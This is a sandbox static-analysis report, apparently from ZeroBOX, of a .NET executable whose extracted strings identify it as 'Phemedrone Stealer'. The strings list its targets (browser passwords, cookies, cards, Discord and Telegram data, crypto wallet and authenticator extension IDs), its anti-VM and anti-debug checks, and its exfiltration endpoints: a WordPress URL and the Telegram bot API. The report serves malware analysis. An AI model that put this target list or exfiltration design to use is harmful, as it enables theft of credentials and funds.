Static | ZeroBOX

PE Compile Time

2023-08-28 00:50:09

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x000140f4    0x00014200        5.82204806426
.rsrc   0x00018000       0x000080ba    0x00008200        5.17686045128
.reloc  0x00022000       0x0000000c    0x00000200        0.101910425663

Resources

Name           Offset      Size        Language      Sub-language     File type
RT_ICON        0x0001c804  0x0000368c  LANG_NEUTRAL  SUBLANG_NEUTRAL  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x0001c804  0x0000368c  LANG_NEUTRAL  SUBLANG_NEUTRAL  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x0001c804  0x0000368c  LANG_NEUTRAL  SUBLANG_NEUTRAL  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON        0x0001c804  0x0000368c  LANG_NEUTRAL  SUBLANG_NEUTRAL  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON  0x0001fe90  0x0000003e  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST    0x0001fed0  0x000001ea  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
__StaticArrayInitTypeSize=10
<>9__0_0
<Main>b__0_0
<GetInheritedClasses>b__0_0
<>c__DisplayClass0_0
<>9__2_0
<Collect>b__2_0
<>c__DisplayClass2_0
<Collect>g__AddFile|2_0
<>9__13_0
<Concat>b__13_0
<>c__DisplayClass3_0
<>9__4_0
<ParseDiscordTokens>b__4_0
<>c__DisplayClass4_0
<>c__DisplayClass5_0
<>c__DisplayClass6_0
<>9__8_0
<GetWindowsVersion>b__8_0
<>c__DisplayClass8_0
<>9__0
<IsVM>b__0
<IsCIS>b__0
<Key3Database>b__0
<ParseDatabase>b__0
<Create>b__0
<ParsePasswords>b__0
<ParseExtensions>b__0
<KillDebuggers>b__0
<ParseColdWallets>b__0
<ParseDatWallets>b__0
<Collect>b__0
<ParseMasterKey>b__0
get_<>h__TransparentIdentifier0
D38F1F4A152CEB94D7366FB851BD64D0C557CD57A0486E57BFB5926A910D5111
<Finalize>d__11
8688D249E9D047B4FC2FB89CE05AFE9EC89252FFCCDD969DE6EEF260DD7FFB21
HMACSHA1
F9CD20F9BE4EBA8920C22293BAF9687E83B65C0DD5D44641A905FC535BC053B1
<>9__0_1
<Main>b__0_1
<GetInheritedClasses>b__0_1
<KillDebuggers>b__0_1
<>c__DisplayClass0_1
<>9__2_1
<Collect>b__2_1
<>c__DisplayClass2_1
<>9__4_1
<ParseDiscordTokens>b__4_1
<>9__5_1
<Key3Database>b__5_1
<>c__DisplayClass6_1
<>9__1
<IsVM>b__1
<Collect>b__1
<>c__0`1
Func`1
IEnumerable`1
Predicate`1
Action`1
EqualityComparer`1
IEnumerator`1
List`1
get_<>h__TransparentIdentifier1
CS$<>8__locals1
__StaticArrayInitTypeSize=12
Microsoft.Win32
UInt32
ToInt32
PBKDF2
<>9__2_2
<Collect>b__2_2
<>c__DisplayClass2_2
<>9__4_2
<ParseDiscordTokens>b__4_2
<>9__5_2
<Key3Database>b__5_2
<>9__2
<Main>b__2
<Collect>b__2
<>f__AnonymousType0`2
<>f__AnonymousType1`2
<>f__AnonymousType2`2
Func`2
IGrouping`2
KeyValuePair`2
Dictionary`2
<>h__TransparentIdentifier2
<>9__0_3
<Main>b__0_3
<>9__2_3
<Collect>b__2_3
<>9__4_3
<ParseDiscordTokens>b__4_3
<>9__5_3
<Key3Database>b__5_3
Func`3
UInt64
ToInt64
<>9__0_4
<Main>b__0_4
<>9__5_4
<Key3Database>b__5_4
<ParseDiscordTokens>b__4
<Collect>b__4
<>9__0_5
<Main>b__0_5
<>9__5_5
<Key3Database>b__5_5
<Collect>b__5
HMACSHA256
__StaticArrayInitTypeSize=6
<>9__5_6
<Key3Database>b__5_6
<>9__6
<Main>b__6
4644D25C296EA1EDD5CA2B89F2032ACB2831E8D6D2BB65F379E56AE3E993AD27
get_UTF8
EncodeUTF8
EncodeUtf8
BAAD10E40DF6B5D52A22FCCE498BBD641EBB2377BB7DA4FE04EE26F084647F69
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
<Module>
<PrivateImplementationDetails>
BerkeleyDB
BuildID
CCH_RM_MAX_SVC_NAME
CCH_RM_MAX_APP_NAME
FILETIME
RM_APP_TYPE
F18366628A466F286AC60A27D59CADD5FD347730C9D55E04CE70FFDA96CB236F
get_ASCII
AntiVM
RM_PROCESS_INFO
System.IO
AntiCIS
RM_UNIQUE_PROCESS
GetCPU
get_IV
set_IV
value__
get_Data
set_Data
CbData
cbData
pbData
fileData
_cbAuthData
_pbAuthData
CryptUnprotectData
get_data
mscorlib
DataBlob
GetMac
DecryptByteDesCbc
DecryptStringDesCbc
System.Collections.Generic
AddStreamAsync
get_Id
get_ManagedThreadId
<>l__initialThreadId
pszAlgId
TSSessionId
childProcessId
dwProcessId
chatId
GetProcessById
get_CurrentThread
pnProcInfoNeeded
SHA1Managed
AesManaged
Opened
_isDisposed
get_encrypted
pReserved
ComputeVoid
NewGuid
GetHwid
<<>h__TransparentIdentifier0>i__Field
<<>h__TransparentIdentifier1>i__Field
<data>i__Field
<encrypted>i__Field
<file>i__Field
<match>i__Field
<Data>k__BackingField
<MasterPassword>k__BackingField
<Type>k__BackingField
<Path>k__BackingField
<Algorithm>k__BackingField
<Vector>k__BackingField
<MasterPass>k__BackingField
<Objects>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Salt>k__BackingField
<GlobalSalt>k__BackingField
<EntrySalt>k__BackingField
<Content>k__BackingField
<IterationCount>k__BackingField
<CipherText>k__BackingField
<Ciphertext>k__BackingField
<PartIv>k__BackingField
<Key>k__BackingField
RecordHeaderField
ReadToEnd
Append
get_Second
set_Method
method
FormatCreditCard
WriteEndRecord
LogRecord
WriteCentralDirRecord
HasDiscord
get_MasterPassword
masterPassword
FormatPassword
password
NetworkInterface
Replace
IsNullOrWhiteSpace
IService
RmService
SenderService
service
CreateInstance
Sequence
_cbNonce
_pbNonce
source
GetHashCode
set_Mode
PaddingMode
chainingMode
CryptoStreamMode
CompressionMode
CipherMode
get_Unicode
get_BigEndianUnicode
FromImage
_centralDirImage
ZipStorage
storage
InputLanguage
language
AddRange
FormatCookie
EndInvoke
BeginInvoke
CrcTable
ReadTable
ReadMasterTable
IEnumerable
IDisposable
bRestartable
ToDouble
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
pSessionHandle
dwSessionHandle
localStateFile
get_file
TakeWhile
RmConsole
hModule
get_Name
procName
methodName
tableName
lpFileName
GetFileName
ParseProfileName
profileName
get_MachineName
dllName
ItemName
strAppName
get_UserName
GetBrowserName
browserName
get_ProcessName
strServiceShortName
get_DirectoryName
NormalizedFilename
filename
username
hostname
modTime
ToFileTime
DateTime
CreationTime
DateTimeToDosTime
AccessTime
ProcessStartTime
ModifyTime
AppendLine
WriteLine
Combine
Phemedrone
get_Type
set_Type
pszBlobType
ValueType
SecurityProtocolType
ApplicationType
set_ContentType
myType
Compare
System.Core
secure
get_Culture
get_InvariantCulture
culture
Capture
ReadOnlyCollectionBase
Key3Database
Key4Database
ParseDatabase
WebResponse
GetResponse
System.IDisposable.Dispose
toParse
Reverse
Create
MulticastDelegate
Deflate
DebuggerBrowsableState
<>1__state
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
get_Minute
Compute
ReadByte
get_Value
NullableValue
GetValue
DecryptValue
NextValue
MutexValue
set_Expect100Continue
HiddenCallResolve
Remove
system.exe
get_Size
CbSize
cbSize
CompressedSize
_pageSize
GrabberFileSize
_sqlDataTypeSize
MaxAuthTagSize
get_HashSize
set_BlockSize
_blockSize
totalSize
Get32BitSize
set_KeySize
Deserialize
SuppressFinalize
Resize
SizeOf
IsSubclassOf
IndexOf
_cbTag
_pbTag
authTag
Config
get_Png
System.Threading
set_Padding
_dbEncoding
GetEncoding
DefaultEncoding
System.Drawing.Imaging
Phemedrone.Cryptography.Hashing
System.Runtime.Versioning
FromBase64String
DownloadString
ParseString
JsonString
ToString
GetString
OctetString
hexString
Substring
disposing
ForceDeflating
System.Drawing
ConvertToULong
AntiDebug
ForEach
get_match
ComputeHash
get_Path
set_Path
levelDbPath
dbPath
fullPath
GetFolderPath
get_Length
SetLength
set_ContentLength
length
EndsWith
StartsWith
get_Month
GrabberDepth
currentDepth
maxDepth
AsyncCallback
callback
CISCheck
performCheck
MutexCheck
FlushFinalBlock
TransformFinalBlock
get_CanSeek
AllocHGlobal
FreeHGlobal
RmCritical
Marshal
System.ComponentModel
SendPanel
PriorityLevel
CheckAll
kernel32.dll
rstrtmgr.dll
FormatAutofill
System.Xml
set_SecurityProtocol
AntiVm
GetUsedRam
GetTotalRam
AddStream
_zipFileStream
get_BaseStream
DeflateStream
NetworkStream
CryptoStream
GetStream
GetRequestStream
MemoryStream
stream
HasSteam
Telegram
Program
AesGcm
get_Item
get_Is64BitOperatingSystem
system
get_Algorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
ICryptoTransform
RootNum
rowNum
Medium
Chromium
Boolean
IsLittleEndian
littleEndian
CopyFromScreen
_leaveOpen
DwInfoVersion
browserVersion
GetWindowsVersion
RmEndSession
RmStartSession
System.IO.Compression
get_Location
profileLocation
rootLocation
location
System.Net.NetworkInformation
GetGeoInformation
pszImplementation
System.Globalization
System.Xml.Serialization
System.Reflection
InputLanguageCollection
MatchCollection
ManagementObjectCollection
get_Position
set_Position
Win32Exception
NotSupportedException
DirectoryNotFoundException
PathTooLongException
ArgumentNullException
InvalidOperationException
UnauthorizedAccessException
ArgumentException
pszDescription
StringComparison
searchPattern
pattern
CopyTo
CreateExtraInfo
pnProcInfo
BcryptAuthenticatedCipherModeInfo
FileInfo
fileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
Bitmap
FilenameInZip
filenameInZip
hwndApp
RmUnknownApp
System.Linq
<<>h__TransparentIdentifier0>j__TPar
<<>h__TransparentIdentifier1>j__TPar
<data>j__TPar
<encrypted>j__TPar
<file>j__TPar
<match>j__TPar
get_Year
Asn1Der
FileGrabber
number
WriteLocalHeader
SQLiteReader
XmlReader
StreamReader
TextReader
BinaryReader
reader
ImportHider
SHA1CryptoServiceProvider
RSACryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
provider
StringBuilder
SpecialFolder
placeholder
ISender
Buffer
FileManager
ServicePointManager
Integer
AntiDebugger
ManagementObjectSearcher
bCipher
ObjectIdentifier
lineHandler
LockHelper
ToUpper
RmExplorer
JsonParser
IBrowser
StreamWriter
TextWriter
BinaryWriter
GetDelegateForFunctionPointer
ServiceCounter
PerformanceCounter
BitConverter
RuntimeResolver
ToLower
XmlSerializer
GetLastWin32Error
IEnumerator
ManagementObjectEnumerator
System.Collections.Generic.IEnumerable<Phemedrone.Classes.LogRecord>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
get_Vector
set_Vector
CreateDecryptor
CreateEncryptor
IntPtr
get_Hour
GetGPUs
Graphics
System.Diagnostics
AddRecords
records
ParsePasswords
TripleDes
GetAllNetworkInterfaces
Phemedrone.Services
nServices
System.Runtime.InteropServices
System.Runtime.CompilerServices
RmRegisterResources
DebuggingModes
get_InstalledInputLanguages
Matches
GetDirectories
_masterTableEntries
_tableEntries
EnumerateFiles
_existingFiles
nFiles
GetFiles
_files
ListProfiles
profiles
NumberStyles
_fieldNames
rgsServiceNames
rgsFilenames
System.Runtime.InteropServices.ComTypes
GetTypes
expires
Phemedrone.Classes
GetInheritedClasses
GetLockingProcesses
GetProcesses
_fileBytes
ReadAllBytes
HexToBytes
_bufferBytes
GetAddressBytes
GetBytes
values
UpdateCrcAndSizes
dwSessionFlags
dwPromptFlags
DwFlags
dwFlags
get_Ticks
Equals
System.Windows.Forms
ParseDiscordTokens
Contains
descriptoins
Phemedrone.Extensions
ParseExtensions
System.Text.RegularExpressions
rgApplications
nApplications
iterations
System.Collections
Phemedrone.Protections
StringSplitOptions
lpdwRebootReasons
FilePatterns
GetDeviceCaps
rgAffectedApps
get_Chars
Phemedrone.Senders
KillDebuggers
debuggers
RuntimeHelpers
BrowserHelpers
Phemedrone.Services.Browsers
ListBrowsers
RSAParameters
ImportParameters
WaitForPendingFinalizers
get_MasterPass
masterPass
get_IsClass
FileAccess
_access
GetOwnerProcess
process
GetProcAddress
GetPhysicalAddress
get_Objects
System.Net.Sockets
ParseColdWallets
CryptoWallets
ParseDatWallets
Arguments
Exists
get_OperationalStatus
AppStatus
arrays
get_Keys
Concat
AppendFormat
ImageFormat
get_IsAbstract
Extract
ManagementBaseObject
hObject
Asn1DerObject
ManagementObject
cbKeyObject
pbKeyObject
object
Select
Collect
Connect
Distinct
CryptprotectPromptstruct
System.Net
wallet
System.Collections.IEnumerator.Reset
useOffset
ReadTableFromOffset
HeaderOffset
_offset
get_Lenght
set_Lenght
set_DefaultConnectionLimit
get_Salt
get_GlobalSalt
globalSalt
get_EntrySalt
entrySalt
get_Default
FirstOrDefault
pcbResult
IAsyncResult
result
GetBytesFromInt
WebClient
TcpClient
System.Management
SqlStatement
Comment
_comment
Environment
System.Collections.Generic.IEnumerator<Phemedrone.Classes.LogRecord>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<Phemedrone.Classes.LogRecord>.get_Current
System.Collections.IEnumerator.get_Current
<>2__current
get_Content
set_Content
get_Count
CreditCardCount
CookieCount
AutoFillCount
get_IterationCount
FilesCount
ExtensionsCount
WalletsCount
GetRowCount
Screenshot
browserRoot
pPrompt
szPrompt
BCrypt
BCryptDecrypt
Encrypt
ThreadStart
TrimStart
Convert
FailFast
HttpWebRequest
MakeFormRequest
DiscordList
PasswordList
ToList
RmGetList
set_Timeout
cbInput
pbInput
cbOutput
pbOutput
MoveNext
System.Text
ReadAllText
pPlainText
get_CipherText
pCipherText
cipherText
_cbMacContext
_pbMacContext
get_Ciphertext
ciphertext
get_PartIv
partIv
get_Now
RmMainWindow
RmOtherWindow
endIdx
startIdx
_bufferEndIndex
_blockIndex
nIndex
_bufferStartIndex
startIndex
prefix
GroupBy
get_Day
InitializeArray
ToArray
InfoArray
get_Key
set_Key
publicKey
GenerateKey
DeserializeKey
strSessionKey
ParseMasterKey
masterKey
hImportKey
BCryptImportKey
BCryptDestroyKey
Phemedrone.Cryptography
System.Security.Cryptography
GetAssembly
GetEntryAssembly
httpOnly
SelectMany
BlockCopy
pEntropy
GetSummary
LoadLibrary
currentDirectory
directory
TableEntry
ZipFileEntry
SqliteMasterEntry
Registry
op_Equality
op_Inequality
get_Priority
BCryptGetProperty
BCryptSetProperty
pszProperty
WrapNonExceptionThrows
Windows Application
Copyright
2023
$4F484650-2787-4FAC-A477-EC30FFAFCD5D
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
{{ file = {0}, data = {1} }}
{{ <>h__TransparentIdentifier0 = {0}, match = {1} }}
{{ <>h__TransparentIdentifier1 = {0}, encrypted = {1} }}
https://rakishevkenes.com/wp-load.php
Apuzony
Password.txt
Messengers/Discord Tokens.txt
wallet.dat
Wallets/
Armory
Atomic
atomic\Local Storage\leveldb
Bytecoin
bytecoin
Coninomi
Coinomi\Coinomi\wallets
com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Electrum
Electrum\wallets
Exodus
Exodus\exodus.wallet
Guarda
Guarda\Local Storage\leveldb
Profiles
key3.db
key4.db
cookies.sqlite
moz_cookies
formhistory.sqlite
moz_formhistory
Browser Data/Cookies_
Browser Data/AutoFills_
logins.json
encryptedUsername
encryptedPassword
hostname
metaData
password
2A864886F70D010C050103
ISO-8859-1
password-check
2A864886F70D01050D
nssPrivate
global-salt
Version
User Data
1.0.0.0
Local State
Network
Cookies
cookies
Web Data
autofill
Login Data
logins
credit_cards
Local Storage
leveldb
CreditCards.txt
Profile*
Default
Authenticator
bhghoamapcdpbohphigoooaddinpkbai
EOS Authenticator
oeljdldpnmdbchonielidgobddffflal
BrowserPass
naepdomgkenhinolocfifgehidddafch
bmikpgodpkclnkgmnpphehdgcimmided
Splikity
jhfjfclepacoldmjmkmdlmganfaalklb
CommonKey
chgfefjpcobfbnpmiokfjjaglahmnded
Zoho Vault
igkpcodhieompeloncfnbekccinhapdb
Norton Password Manager
admmjipmmciaobhojoghlmleefbicajg
Avira Password Manager
caljgklbbfbcjjanaijlacgncafpegll
Trezor Password Manager
imloifkgjagghnncjkhggdhalmcnfklk
MetaMask
nkbihfbeogaeaoehlefnkodbefgpgknn
TronLink
ibnejdfjmmkpcnlpebklmnkoeoihofec
BinanceChain
fhbohimaelbohpjbbldcngcnapndodjp
Coin98
aeachknmefphepccionboohckonoeemg
iWallet
kncchdigobghenbbaddojjnnaogfppfj
Wombat
amkmjjmmflddogmhpjloimipbofnfjih
MEW CX
nlbmnnijcnlegkjjpcfjclmcfggfefdm
NeoLine
cphhlgmgameodnhkjdmkpanlelnlohao
Terra Station
aiifbnbfobpmeekipheeijimdpnlpgpp
dmkamcknogkgcdfhhbddcghachkejeap
Sollet
fhmfendgdocmcbmfikdcogofphimnkno
ICONex
flpiciilemghbmfalicajoolhkkenfel
hcflpincpppdclinealmandijcmnkbgn
TezBox
mnfifefkajgofkcjkemidiaecocnkjeh
nlgbhdfgdhgbiamfdfmbikcdghidoadd
OneKey
ilbbpajmiplgpehdikmejfemfklpkmke
Trust Wallet
pknlccmneadmjbkollckpblgaaabameg
MetaWallet
pfknkoocfefiocadajpngdknmkjgakdg
Guarda Wallet
fcglfhcjfpkgdppjbglknafgfffkelnm
idkppnahnmmggbmfkjhiakkbkdpnmnon
Jaxx Liberty
mhonjhhcgphdphdjcdoeodfdliikapmj
Atomic Wallet
bhmlbgebokamljgnceonbncdofmmkedg
hieplnfojfccegoloniefimmbfjdgcgp
Mycelium
pidhddgciaponoajdngciiemcflpnnbg
Coinomi
blbpgcogcoohhngdjafgpoagcilicpjh
GreenAddress
gflpckpfdgcagnbdfafmibcmkadnlhpj
doljkehcfhidippihgakcihcmnknlphh
nbokbjkelpmlgflobbohapifnnenbjlh
Samourai Wallet
apjdnokplgcjkejimjdfjnhmjlbpgkdi
ieedgmmkpkbiblijbbldefkomatsuahh
jifanbgejlbcmhbbdbnfbfnlmbomjedj
Airbitz
KeepKey
dojmlmceifkfgkgeejemfciibjehhdcl
Trezor
jpxupxjxheguvfyhfhahqvxvyqthiryh
Ledger Live
pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln
Ledger Wallet
hbpfjlflhnmkddbjdchbbifhllgmmhnm
Bitbox
ocmfilhakdbncmojmlbagpkjfbmeinbd
Digital Bitbox
dbhklojmlkgmpihhdooibnmidfpeaing
YubiKey
mammpjaaoinfelloncbbpomjcihbkmmc
Google Authenticator
khcodhlfkpmhibicdjjblnkgimdepgnd
Microsoft Authenticator
bfbdnbpibgndpjfhonkflpkijfapmomn
gjffdbjndmcafeoehgdldobgjmlepcal
Duo Mobile
eidlicjlkaiefdbgmdepmmicpbggmhoj
OTP Auth
bobfejfdlhnabgglompioclndjejolch
FreeOTP
elokfmmmjbadpgdjmgglocapdckdcpkn
Aegis Authenticator
ppdjlkfkedmidmclhakfncpfdmdgmjpm
LastPass Authenticator
cfoajccjibkjhbdjnpkbananbejpkkjb
Dashlane
flikjlpgnpcjdienoojmgliechmmheek
Keeper
gofhklgdnbnpcdigdgkgfobhhghjmmkj
RoboForm
hppmchachflomkejbhofobganapojjol
KeePass
lbfeahdfdkibininjgejjgpdafeopflb
KeePassXC
kgeohlebpjgcfiidfhhdlnnkhefajmca
Bitwarden
inljaljiffkdgmlndjkdiepghpolcpki
NordPass
njgnlkhcjgmjfnfahdmfkalpjcneebpl
LastPass
gabedfkgnbglfbnplfpjddgfnbibkmbb
Local Extension Settings
Browser Data/Extensions/
Module Info Cache
Last Version
*cord*
FileGrabber
,d88b.d88b,
88888888888 Phemedrone Stealer
`Y8888888Y' {0:dd/MM/yyyy HH:mm:ss}
`Y888Y' Developed by https://t.me/reyvortex & https://t.me/TheDyer
`Y' Tag: {1}
----- Geolocation Data -----
{2,-25}{3}
{4,-25}{5} ({6})
{7,-25}{8}
{9,-25}{10}
{11,-25}{12}
----- Hardware Info -----
{13,-25}{14}\{15}
{16,-25}{17} {18}
{19,-25}{20}
{21,-25}{22}
{23,-25}{24}
{25,-25}{26} / {27} GB
----- Report Contents -----
{28,-25}{29}
{30,-25}{31}
{32,-25}{33}
{34,-25}{35}
{36,-25}{37}
{38,-25}{39}
{40,-25}{41}
----- Miscellaneous -----
{42,-25}{43}
{44,-25}{45}
Country:
country
countryCode
Postal:
Username:
Windows name:
Hardware ID:
{0,-25}
Passwords:
Cookies:
Credit Cards:
AutoFills:
Extensions
Wallets:
Files:
Antivirus products:
File Location:
unknown
Information.txt
*Phemedrone Stealer Report* \| by @reyvortex & @TheDyer
``` - IP: {0} \({1}\)
- Tag: {2} {3}
- Passwords: {4}
- Cookies: {5}
- Wallets: {6}```
https://github\.com/REvorker1/Phemedrone\-Stealer
Unknown
-Phemedrone-Report.zip
http://ip-api.com/json/?fields=11827
root\SecurityCenter2
SELECT * FROM AntivirusProduct
displayName
Memory
Available Bytes
SELECT * FROM Win32_VideoController
SELECT * FROM Win32_Processor
SELECT * FROM Win32_ComputerSystem
TotalPhysicalMemory
Win32_Processor
ProcessorId
Win32_DiskDrive
SerialNumber
SELECT * FROM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
user32.dll
gdi32.dll
GetDeviceCaps
Screenshot.png
*ssfn*
\config
Steam/
HKEY_CURRENT_USER\Software\Valve\Steam
SteamPath
HKEY_CLASSES_ROOT\tg\DefaultIcon
usertag
settings
key_data
prefix
Messengers/Telegram/
filename
filedescription
----------------------------
multipart/form-data; boundary=
Content-Disposition: form-data; name="
"; filename="
Content-Type: application/octet-stream
https://api.telegram.org/bot{0}/sendDocument
document
chat_id
parse_mode
MarkdownV2
caption
wireshark
httpdebbugerui
VirtualBox
VMware Virtual
VMware
Hyper-V Video
az-Latn-AZ
tg-Cyrl-TJ
Name:
Value:
Hostname:
Username:
Password:
Browser:
Number: {0}
Placeholder: {1}
Expiration: {2}/{3}
Browser: {4} v{5} ({6})
encrypted_key
dQw4w9WgXcQ:[^"]*
dQw4w9WgXcQ:
SELECT * FROM Win32_Process WHERE ProcessId = {0}
root\CIMV2
ParentProcessId
UNIQUE
Writing is not allowed
bcrypt.dll
BCryptDecrypt
BCryptDestroyKey
BCryptCloseAlgorithmProvider
Microsoft Primitive Provider
ChainingModeGCM
BCryptOpenAlgorithmProvider
BCryptSetProperty
ChainingMode
AuthTagLength
BCryptImportKey
ObjectLength
KeyDataBlob
BCryptGetProperty
crypt32.dll
CryptUnprotectData
algorithm
Algorithm cannot be null.
Password cannot be null.
Salt cannot be null.
Derived key too long.
SEQUENCE {
{0:X2}
INTEGER
OCTETSTRING
OBJECTIDENTIFIER
00061561
WEBASYST
No antivirus signatures available.
No IRMA results available.